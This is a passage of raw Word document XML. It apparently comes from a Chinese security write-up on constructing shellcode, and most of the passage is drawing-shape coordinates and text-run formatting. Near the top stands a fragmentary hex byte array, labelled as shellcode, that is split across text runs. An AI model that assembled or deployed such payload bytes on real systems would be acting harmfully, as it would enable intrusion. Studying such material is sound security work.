        <w:t>0xf4,0x4e,0xfa,0x76,0xf8,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0x38,0x7c,0xb7,0x6b,0xac,0xc1,0x27,0x6b,0xae,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0x80,0x10,0x85,0x98,0x61,0x42,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0x1e,0x1e,0xb0,0x58,0x6b,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0xff,0x92,0x68,0xa5,0x29,0x45,0x99,0x9c,0xa2,0xc0,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0x29,0x53,0xc3,0x4b,0x76,0x72,0x1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7,0x60,0x3d,0xd8,0x11,0xce,0xc0,0xe6,0x34,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0xa1,0x26,0x65,0x98,0x79,0xf6,0x58,0x92,0x41,0x04,0xa0,0xf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0,0x3d,0xf1,0x44,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0xb9,0x63,0x42,0x1a,0xac,0xad,0x67,0x98,0x8f,0x27,0x73,0x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dd,0x54,0x61,0x65,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0xd1,0x72,0xc5,0x0f,0x8a,0x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d3,0x80,0x6a,0xc3,0xf6,0x44,0x2f,0x1a,0x6a,0xe6,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0xfa,0x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6c,0xa5,0x95,0x54,0x47,0x54,0xbf,0x66,0x78,0xfd,0x40,0x10,0x62,0xe8,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0xc0,0x93,0xa8,0x80,0xb9,0x37,0x4c,0x47,0x7b,0x61,0xc1,0x44,0x13,0x17,0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7f,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0xa2,0x73,0xcd,0x76,0x5f,0x2a,0x98,0x92,0x3e,0x09,0xa3,0x60,0x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eb,0x41,0x1a,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0xf4,0xcb,0x6f,0x96,0xc6,0x3c,0xf0,0xda,0xc6,0x1c,0x1c,0xb6,0xa0,0x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,0x67,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0x7b,0xdc,0xe2,0x43,0xf1,0xee,0x3b,0x93,0xb9,0x95,0x2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9,0x01,0x97,0x8c,0x09,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0x72,0xee,0x78,0x1a,0x13,0x60,0xa6,0xac,0x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05,0x99,0x6c,0x28,0x81,0x29,0x5d,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0x37,0x89,0x2a,0x3d,0xbf,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0x0e,0xc7,0xeb,0x9f,0x44,0x1d,0xb3,0x4d,0x1a,0xbc,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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xe2,0x22,0xb2,0xb3,0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xa6,0x43,0x3e,0x46,0xc5,0x0d,0xba,0x87,0xd5,0x6d,0x70,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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xfe,0x87,0x58,0x2c,0x4b,0x8c,0x2d,0x56,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0x21,0x4a,0xbf,0x45,0x8c,0xd9,0x9e,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman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000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xa0,0xe4,0x20,0x6b,0x7f,0xfb,0xd0,0x1e,0x88,0x13,0x6e,0x11,0xe9,0xd9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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25"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>};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52.6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其中分离s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hellcode。构造如下：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466.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15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p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:711.83pt;width:0.0pt;height:130.916pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14221" coordsize="0,2618">
        <v:shape style="position:absolute;left:10402;top:14221;width:0;height:2618" coordorigin="10402,14221" coordsize="0,2618" path="m10402,14221l10402,14221,10402,14221,10402,14221,10402,14221,10402,14221,10402,14221,10402,14222,10402,14222,10402,14222,10402,14222,10402,14223,10402,14223,10402,14224,10402,14225,10402,14225,10402,14226,10402,14228,10402,14229,10402,14230,10402,14232,10402,14234,10402,14236,10402,14238,10402,14240,10402,14243,10402,14245,10402,14248,10402,14252,10402,14255,10402,14259,10402,14263,10402,14267,10402,14272,10402,14277,10402,14282,10402,14288,10402,14294,10402,14300,10402,14306,10402,14313,10402,14321,10402,14328,10402,14336,10402,14345,10402,14354,10402,14363,10402,14372,10402,14382,10402,14393,10402,14404,10402,14415,10402,14427,10402,14440,10402,14452,10402,14466,10402,14480,10402,14494,10402,14509,10402,14524,10402,14540,10402,14557,10402,14574,10402,14591,10402,14610,10402,14628,10402,14648,10402,14668,10402,14688,10402,14710,10402,14732,10402,14754,10402,14777,10402,14801,10402,14826,10402,14851,10402,14877,10402,14903,10402,14931,10402,14959,10402,14987,10402,15017,10402,15047,10402,15078,10402,15110,10402,15142,10402,15175,10402,15209,10402,15244,10402,15280,10402,15317,10402,15354,10402,15392,10402,15431,10402,15471,10402,15512,10402,15553,10402,15596,10402,15639,10402,15684,10402,15729,10402,15775,10402,15822,10402,15870,10402,15919,10402,15969,10402,16020,10402,16072,10402,16125,10402,16178,10402,16233,10402,16289,10402,16346,10402,16404,10402,16463,10402,16523,10402,16584,10402,16646,10402,16710,10402,16774,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:710.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14210" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:14210;width:8990;height:670" coordorigin="1490,14210" coordsize="8990,670" path="m1510,14221l1510,14221,1510,14221,1510,14221,1510,14221,1510,14221,1510,14221,1511,14221,1512,14221,1512,14221,1514,14221,1515,14221,1517,14221,1519,14221,1521,14221,1524,14221,1528,14221,1532,14221,1536,14221,1541,14221,1546,14221,1552,14221,1559,14221,1566,14221,1575,14221,1583,14221,1593,14221,1603,14221,1615,14221,1627,14221,1640,14221,1654,14221,1668,14221,1684,14221,1701,14221,1719,14221,1738,14221,1758,14221,1780,14221,1802,14221,1826,14221,1851,14221,1877,14221,1904,14221,1933,14221,1963,14221,1995,14221,2028,14221,2063,14221,2099,14221,2136,14221,2175,14221,2216,14221,2259,14221,2303,14221,2348,14221,2396,14221,2445,14221,2496,14221,2549,14221,2604,14221,2660,14221,2719,14221,2779,14221,2841,14221,2906,14221,2972,14221,3041,14221,3112,14221,3184,14221,3259,14221,3336,14221,3416,14221,3498,14221,3582,14221,3668,14221,3757,14221,3848,14221,3941,14221,4037,14221,4136,14221,4236,14221,4340,14221,4446,14221,4555,14221,4666,14221,4780,14221,4897,14221,5017,14221,5139,14221,5264,14221,5392,14221,5523,14221,5657,14221,5793,14221,5933,14221,6076,14221,6222,14221,6370,14221,6522,14221,6677,14221,6835,14221,6997,14221,7161,14221,7329,14221,7500,14221,7675,14221,7853,14221,8034,14221,8219,14221,8407,14221,8598,14221,8793,14221,8992,14221,9194,14221,9400,14221,9609,14221,9823,14221,10039,14221,10260,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14221,10484,14222,10484,14222,10484,14222,10484,14222,10484,14222,10484,14222,10484,14223,10484,14223,10484,14223,10484,14224,10484,14224,10484,14225,10484,14225,10484,14226,10484,14227,10484,14227,10484,14228,10484,14229,10484,14230,10484,14231,10484,14232,10484,14233,10484,14234,10484,14235,10484,14237,10484,14238,10484,14239,10484,14241,10484,14243,10484,14244,10484,14246,10484,14248,10484,14250,10484,14252,10484,14255,10484,14257,10484,14259,10484,14262,10484,14265,10484,14267,10484,14270,10484,14273,10484,14276,10484,14280,10484,14283,10484,14286,10484,14290,10484,14294,10484,14298,10484,14302,10484,14306,10484,14310,10484,14315,10484,14319,10484,14324,10484,14329,10484,14334,10484,14339,10484,14344,10484,14350,10484,14356,10484,14361,10484,14367,10484,14374,10484,14380,10484,14386,10484,14393,10484,14400,10484,14407,10484,14414,10484,14422,10484,14429,10484,14437,10484,14445,10484,14453,10484,14462,10484,14470,10484,14479,10484,14488,10484,14497,10484,14507,10484,14516,10484,14526,10484,14536,10484,14547,10484,14557,10484,14568,10484,14579,10484,14590,10484,14601,10484,14613,10484,14625,10484,14637,10484,14649,10484,14662,10484,14675,10484,14688,10484,14701,10484,14715,10484,14729,10484,14743,10484,14757,10484,14772,10484,14787,10484,14802,10484,14817,10484,14833,10484,14849,10484,14865,10484,14881,10484,14881,10484,14882,10484,14881,10484,14882,10484,14881,10484,14881,10483,14881,10482,14881,10482,14881,10480,14881,10479,14882,10477,14881,10475,14882,10473,14881,10470,14882,10466,14882,10462,14881,10458,14881,10453,14881,10448,14882,10442,14881,10435,14882,10428,14882,10419,14882,10411,14882,10401,14881,10391,14882,10379,14881,10367,14881,10354,14882,10340,14882,10326,14881,10310,14882,10293,14881,10275,14881,10256,14881,10236,14882,10215,14881,10192,14882,10168,14881,10143,14882,10117,14881,10090,14882,10061,14881,10031,14882,9999,14881,9966,14882,9931,14881,9895,14882,9858,14881,9819,14882,9778,14881,9735,14882,9691,14881,9646,14881,9598,14881,9549,14882,9498,14881,9445,14882,9391,14881,9334,14881,9275,14881,9215,14881,9153,14881,9088,14881,9022,14881,8953,14881,8883,14881,8810,14881,8735,14881,8658,14881,8578,14881,8497,14881,8413,14881,8326,14881,8238,14881,8146,14881,8053,14881,7957,14881,7859,14881,7758,14881,7654,14881,7548,14881,7439,14881,7328,14881,7214,14881,7097,14881,6977,14881,6855,14881,6730,14881,6602,14881,6471,14881,6337,14881,6201,14881,6061,14881,5918,14882,5773,14881,5624,14881,5472,14881,5317,14881,5159,14881,4997,14881,4833,14881,4665,14881,4494,14881,4319,14881,4141,14881,3960,14882,3776,14881,3587,14881,3396,14881,3201,14881,3002,14881,2800,14881,2594,14881,2385,14881,2172,14881,1955,14881,1734,14882,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14881,1510,14880,1510,14880,1510,14880,1510,14880,1510,14879,1510,14879,1510,14878,1510,14878,1510,14877,1510,14877,1510,14876,1510,14875,1510,14875,1510,14874,1510,14873,1510,14872,1510,14871,1510,14870,1510,14869,1510,14867,1510,14866,1510,14865,1510,14863,1510,14862,1510,14860,1510,14858,1510,14856,1510,14854,1510,14852,1510,14850,1510,14848,1510,14846,1510,14843,1510,14841,1510,14838,1510,14835,1510,14833,1510,14830,1510,14826,1510,14823,1510,14820,1510,14816,1510,14813,1510,14809,1510,14805,1510,14801,1510,14797,1510,14793,1510,14788,1510,14784,1510,14779,1510,14774,1510,14769,1510,14764,1510,14758,1510,14753,1510,14747,1510,14741,1510,14735,1510,14729,1510,14723,1510,14716,1510,14709,1510,14703,1510,14696,1510,14688,1510,14681,1510,14673,1510,14665,1510,14657,1510,14649,1510,14641,1510,14632,1510,14623,1510,14614,1510,14605,1510,14596,1510,14586,1510,14576,1510,14566,1510,14556,1510,14546,1510,14535,1510,14524,1510,14513,1510,14501,1510,14490,1510,14478,1510,14466,1510,14453,1510,14441,1510,14428,1510,14415,1510,14401,1510,14388,1510,14374,1510,14360,1510,14346,1510,14331,1510,14316,1510,14301,1510,14286,1510,14270,1510,14254,1510,14238,1510,14221e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:710.400pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:743.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14870" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:14870;width:8990;height:370" coordorigin="1490,14870" coordsize="8990,370" path="m1510,14881l1510,14881,1510,14882,1510,14881,1510,14882,1510,14881,1510,14881,1511,14881,1512,14881,1512,14881,1514,14881,1515,14882,1517,14881,1519,14882,1521,14881,1524,14882,1528,14882,1532,14881,1536,14881,1541,14881,1546,14882,1552,14881,1559,14882,1566,14882,1575,14882,1583,14882,1593,14881,1603,14882,1615,14881,1627,14881,1640,14882,1654,14882,1668,14881,1684,14882,1701,14881,1719,14881,1738,14881,1758,14882,1780,14881,1802,14882,1826,14881,1851,14882,1877,14881,1904,14882,1933,14881,1963,14882,1995,14881,2028,14882,2063,14881,2099,14882,2136,14881,2175,14882,2216,14881,2259,14882,2303,14881,2348,14881,2396,14881,2445,14882,2496,14881,2549,14882,2604,14881,2660,14881,2719,14881,2779,14881,2841,14881,2906,14881,2972,14881,3041,14881,3112,14881,3184,14881,3259,14881,3336,14881,3416,14881,3498,14881,3582,14881,3668,14881,3757,14881,3848,14881,3941,14881,4037,14881,4136,14881,4236,14881,4340,14881,4446,14881,4555,14881,4666,14881,4780,14881,4897,14881,5017,14881,5139,14881,5264,14881,5392,14881,5523,14881,5657,14881,5793,14881,5933,14881,6076,14882,6222,14881,6370,14881,6522,14881,6677,14881,6835,14881,6997,14881,7161,14881,7329,14881,7500,14881,7675,14881,7853,14881,8034,14882,8219,14881,8407,14881,8598,14881,8793,14881,8992,14881,9194,14881,9400,14881,9609,14881,9823,14881,10039,14881,10260,14882,10484,14881,10484,14881,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14882,10484,14883,10484,14883,10484,14883,10484,14883,10484,14883,10484,14884,10484,14884,10484,14884,10484,14885,10484,14885,10484,14886,10484,14886,10484,14887,10484,14887,10484,14888,10484,14889,10484,14889,10484,14890,10484,14891,10484,14891,10484,14892,10484,14893,10484,14894,10484,14895,10484,14896,10484,14897,10484,14898,10484,14900,10484,14901,10484,14902,10484,14904,10484,14905,10484,14907,10484,14908,10484,14910,10484,14912,10484,14913,10484,14915,10484,14917,10484,14919,10484,14921,10484,14923,10484,14925,10484,14928,10484,14930,10484,14932,10484,14935,10484,14938,10484,14940,10484,14943,10484,14946,10484,14949,10484,14952,10484,14955,10484,14958,10484,14961,10484,14965,10484,14968,10484,14972,10484,14975,10484,14979,10484,14983,10484,14987,10484,14991,10484,14995,10484,14999,10484,15004,10484,15008,10484,15013,10484,15017,10484,15022,10484,15027,10484,15032,10484,15037,10484,15043,10484,15048,10484,15053,10484,15059,10484,15065,10484,15071,10484,15077,10484,15083,10484,15089,10484,15095,10484,15102,10484,15108,10484,15115,10484,15122,10484,15129,10484,15136,10484,15143,10484,15151,10484,15158,10484,15166,10484,15174,10484,15182,10484,15190,10484,15198,10484,15207,10484,15215,10484,15224,10484,15233,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10483,15242,10482,15242,10482,15242,10480,15242,10479,15242,10477,15242,10475,15242,10473,15242,10470,15242,10466,15242,10462,15242,10458,15242,10453,15242,10448,15242,10442,15242,10435,15242,10428,15242,10419,15242,10411,15242,10401,15242,10391,15242,10379,15242,10367,15242,10354,15242,10340,15242,10326,15242,10310,15242,10293,15242,10275,15242,10256,15242,10236,15242,10215,15242,10192,15242,10168,15242,10143,15242,10117,15242,10090,15242,10061,15242,10031,15242,9999,15242,9966,15242,9931,15242,9895,15242,9858,15242,9819,15242,9778,15242,9735,15242,9691,15242,9646,15242,9598,15242,9549,15242,9498,15242,9445,15242,9391,15242,9334,15242,9275,15242,9215,15242,9153,15242,9088,15242,9022,15242,8953,15242,8883,15242,8810,15242,8735,15242,8658,15242,8578,15242,8497,15242,8413,15242,8326,15242,8238,15242,8146,15242,8053,15242,7957,15242,7859,15242,7758,15242,7654,15242,7548,15242,7439,15242,7328,15242,7214,15242,7097,15242,6977,15242,6855,15242,6730,15242,6602,15242,6471,15242,6337,15242,6201,15242,6061,15242,5918,15242,5773,15242,5624,15242,5472,15242,5317,15242,5159,15242,4997,15242,4833,15242,4665,15242,4494,15242,4319,15242,4141,15242,3960,15242,3776,15242,3587,15242,3396,15242,3201,15242,3002,15242,2800,15242,2594,15242,2385,15242,2172,15242,1955,15242,1734,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15241,1510,15240,1510,15240,1510,15240,1510,15240,1510,15239,1510,15239,1510,15239,1510,15238,1510,15238,1510,15237,1510,15237,1510,15236,1510,15236,1510,15235,1510,15235,1510,15234,1510,15233,1510,15233,1510,15232,1510,15231,1510,15230,1510,15229,1510,15228,1510,15227,1510,15226,1510,15225,1510,15223,1510,15222,1510,15221,1510,15219,1510,15218,1510,15217,1510,15215,1510,15213,1510,15212,1510,15210,1510,15208,1510,15206,1510,15204,1510,15202,1510,15200,1510,15198,1510,15196,1510,15193,1510,15191,1510,15188,1510,15186,1510,15183,1510,15180,1510,15177,1510,15174,1510,15171,1510,15168,1510,15165,1510,15162,1510,15159,1510,15155,1510,15152,1510,15148,1510,15144,1510,15140,1510,15136,1510,15132,1510,15128,1510,15124,1510,15119,1510,15115,1510,15110,1510,15106,1510,15101,1510,15096,1510,15091,1510,15086,1510,15081,1510,15075,1510,15070,1510,15064,1510,15058,1510,15053,1510,15047,1510,15041,1510,15034,1510,15028,1510,15021,1510,15015,1510,15008,1510,15001,1510,14994,1510,14987,1510,14980,1510,14972,1510,14965,1510,14957,1510,14949,1510,14941,1510,14933,1510,14925,1510,14917,1510,14908,1510,14899,1510,14891,1510,14881e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:743.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14870" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:14870;width:30;height:370" coordorigin="1490,14870" coordsize="30,370" path="m1517,14881l1517,14881,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14882,1517,14883,1517,14883,1517,14883,1517,14883,1517,14883,1517,14884,1517,14884,1517,14884,1517,14885,1517,14885,1517,14886,1517,14886,1517,14887,1517,14887,1517,14888,1517,14889,1517,14889,1517,14890,1517,14891,1517,14891,1517,14892,1517,14893,1517,14894,1517,14895,1517,14896,1517,14897,1517,14898,1517,14900,1517,14901,1517,14902,1517,14904,1517,14905,1517,14907,1517,14908,1517,14910,1517,14912,1517,14913,1517,14915,1517,14917,1517,14919,1517,14921,1517,14923,1517,14925,1517,14928,1517,14930,1517,14932,1517,14935,1517,14938,1517,14940,1517,14943,1517,14946,1517,14949,1517,14952,1517,14955,1517,14958,1517,14961,1517,14965,1517,14968,1517,14972,1517,14975,1517,14979,1517,14983,1517,14987,1517,14991,1517,14995,1517,14999,1517,15004,1517,15008,1517,15013,1517,15017,1517,15022,1517,15027,1517,15032,1517,15037,1517,15043,1517,15048,1517,15053,1517,15059,1517,15065,1517,15071,1517,15077,1517,15083,1517,15089,1517,15095,1517,15102,1517,15108,1517,15115,1517,15122,1517,15129,1517,15136,1517,15143,1517,15151,1517,15158,1517,15166,1517,15174,1517,15182,1517,15190,1517,15198,1517,15207,1517,15215,1517,15224,1517,15233,1517,15242e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15230;width:8990;height:370" coordorigin="1490,15230" coordsize="8990,370" path="m1510,15242l1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1511,15242,1512,15242,1512,15242,1514,15242,1515,15242,1517,15242,1519,15242,1521,15242,1524,15242,1528,15242,1532,15242,1536,15242,1541,15242,1546,15242,1552,15242,1559,15242,1566,15242,1575,15242,1583,15242,1593,15242,1603,15242,1615,15242,1627,15242,1640,15242,1654,15242,1668,15242,1684,15242,1701,15242,1719,15242,1738,15242,1758,15242,1780,15242,1802,15242,1826,15242,1851,15242,1877,15242,1904,15242,1933,15242,1963,15242,1995,15242,2028,15242,2063,15242,2099,15242,2136,15242,2175,15242,2216,15242,2259,15242,2303,15242,2348,15242,2396,15242,2445,15242,2496,15242,2549,15242,2604,15242,2660,15242,2719,15242,2779,15242,2841,15242,2906,15242,2972,15242,3041,15242,3112,15242,3184,15242,3259,15242,3336,15242,3416,15242,3498,15242,3582,15242,3668,15242,3757,15242,3848,15242,3941,15242,4037,15242,4136,15242,4236,15242,4340,15242,4446,15242,4555,15242,4666,15242,4780,15242,4897,15242,5017,15242,5139,15242,5264,15242,5392,15242,5523,15242,5657,15242,5793,15242,5933,15242,6076,15242,6222,15242,6370,15242,6522,15242,6677,15242,6835,15242,6997,15242,7161,15242,7329,15242,7500,15242,7675,15242,7853,15242,8034,15242,8219,15242,8407,15242,8598,15242,8793,15242,8992,15242,9194,15242,9400,15242,9609,15242,9823,15242,10039,15242,10260,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15243,10484,15243,10484,15243,10484,15243,10484,15243,10484,15244,10484,15244,10484,15244,10484,15245,10484,15245,10484,15246,10484,15246,10484,15247,10484,15247,10484,15248,10484,15248,10484,15249,10484,15250,10484,15250,10484,15251,10484,15252,10484,15253,10484,15254,10484,15255,10484,15256,10484,15257,10484,15258,10484,15259,10484,15261,10484,15262,10484,15263,10484,15265,10484,15266,10484,15268,10484,15270,10484,15271,10484,15273,10484,15275,10484,15277,10484,15279,10484,15281,10484,15283,10484,15285,10484,15287,10484,15290,10484,15292,10484,15295,10484,15297,10484,15300,10484,15303,10484,15306,10484,15309,10484,15312,10484,15315,10484,15318,10484,15321,10484,15325,10484,15328,10484,15332,10484,15336,10484,15339,10484,15343,10484,15347,10484,15351,10484,15356,10484,15360,10484,15364,10484,15369,10484,15374,10484,15378,10484,15383,10484,15388,10484,15393,10484,15399,10484,15404,10484,15409,10484,15415,10484,15421,10484,15427,10484,15433,10484,15439,10484,15445,10484,15451,10484,15458,10484,15464,10484,15471,10484,15478,10484,15485,10484,15492,10484,15499,10484,15507,10484,15514,10484,15522,10484,15530,10484,15538,10484,15546,10484,15554,10484,15563,10484,15572,10484,15580,10484,15589,10484,15598,10484,15607,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10483,15617,10482,15617,10482,15617,10480,15617,10479,15617,10477,15617,10475,15617,10473,15617,10470,15617,10466,15617,10462,15617,10458,15617,10453,15617,10448,15617,10442,15617,10435,15617,10428,15617,10419,15617,10411,15617,10401,15617,10391,15617,10379,15617,10367,15617,10354,15617,10340,15617,10326,15617,10310,15617,10293,15617,10275,15617,10256,15617,10236,15617,10215,15617,10192,15617,10168,15617,10143,15617,10117,15617,10090,15617,10061,15617,10031,15617,9999,15617,9966,15617,9931,15617,9895,15617,9858,15617,9819,15617,9778,15617,9735,15617,9691,15617,9646,15617,9598,15617,9549,15617,9498,15617,9445,15617,9391,15617,9334,15617,9275,15617,9215,15617,9153,15617,9088,15617,9022,15617,8953,15617,8883,15617,8810,15617,8735,15617,8658,15617,8578,15617,8497,15617,8413,15617,8326,15617,8238,15617,8146,15617,8053,15617,7957,15617,7859,15617,7758,15617,7654,15617,7548,15617,7439,15617,7328,15617,7214,15617,7097,15617,6977,15617,6855,15617,6730,15617,6602,15617,6471,15617,6337,15617,6201,15617,6061,15617,5918,15617,5773,15617,5624,15617,5472,15617,5317,15617,5159,15617,4997,15617,4833,15617,4665,15617,4494,15617,4319,15617,4141,15617,3960,15617,3776,15617,3587,15617,3396,15617,3201,15617,3002,15617,2800,15617,2594,15617,2385,15617,2172,15617,1955,15617,1734,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15615,1510,15615,1510,15615,1510,15615,1510,15614,1510,15614,1510,15613,1510,15613,1510,15612,1510,15612,1510,15611,1510,15611,1510,15610,1510,15610,1510,15609,1510,15608,1510,15607,1510,15606,1510,15606,1510,15605,1510,15604,1510,15603,1510,15602,1510,15600,1510,15599,1510,15598,1510,15597,1510,15595,1510,15594,1510,15592,1510,15591,1510,15589,1510,15587,1510,15586,1510,15584,1510,15582,1510,15580,1510,15578,1510,15576,1510,15573,1510,15571,1510,15569,1510,15566,1510,15564,1510,15561,1510,15559,1510,15556,1510,15553,1510,15550,1510,15547,1510,15544,1510,15541,1510,15537,1510,15534,1510,15530,1510,15527,1510,15523,1510,15519,1510,15515,1510,15511,1510,15507,1510,15503,1510,15499,1510,15494,1510,15490,1510,15485,1510,15480,1510,15475,1510,15470,1510,15465,1510,15460,1510,15455,1510,15449,1510,15443,1510,15438,1510,15432,1510,15426,1510,15420,1510,15414,1510,15407,1510,15401,1510,15394,1510,15387,1510,15381,1510,15374,1510,15366,1510,15359,1510,15352,1510,15344,1510,15336,1510,15329,1510,15321,1510,15312,1510,15304,1510,15296,1510,15287,1510,15278,1510,15269,1510,15260,1510,15251,1510,15242e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:15230;width:30;height:390" coordorigin="1490,15230" coordsize="30,390" path="m1517,15242l1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15243,1517,15243,1517,15243,1517,15243,1517,15243,1517,15244,1517,15244,1517,15244,1517,15245,1517,15245,1517,15246,1517,15246,1517,15247,1517,15247,1517,15248,1517,15248,1517,15249,1517,15250,1517,15250,1517,15251,1517,15252,1517,15253,1517,15254,1517,15255,1517,15256,1517,15257,1517,15258,1517,15259,1517,15261,1517,15262,1517,15263,1517,15265,1517,15266,1517,15268,1517,15270,1517,15271,1517,15273,1517,15275,1517,15277,1517,15279,1517,15281,1517,15283,1517,15285,1517,15287,1517,15290,1517,15292,1517,15295,1517,15297,1517,15300,1517,15303,1517,15306,1517,15309,1517,15312,1517,15315,1517,15318,1517,15321,1517,15325,1517,15328,1517,15332,1517,15336,1517,15339,1517,15343,1517,15347,1517,15351,1517,15356,1517,15360,1517,15364,1517,15369,1517,15374,1517,15378,1517,15383,1517,15388,1517,15393,1517,15399,1517,15404,1517,15409,1517,15415,1517,15421,1517,15427,1517,15433,1517,15439,1517,15445,1517,15451,1517,15458,1517,15464,1517,15471,1517,15478,1517,15485,1517,15492,1517,15499,1517,15507,1517,15514,1517,15522,1517,15530,1517,15538,1517,15546,1517,15554,1517,15563,1517,15572,1517,15580,1517,15589,1517,15598,1517,15607,1517,15617e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:253.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
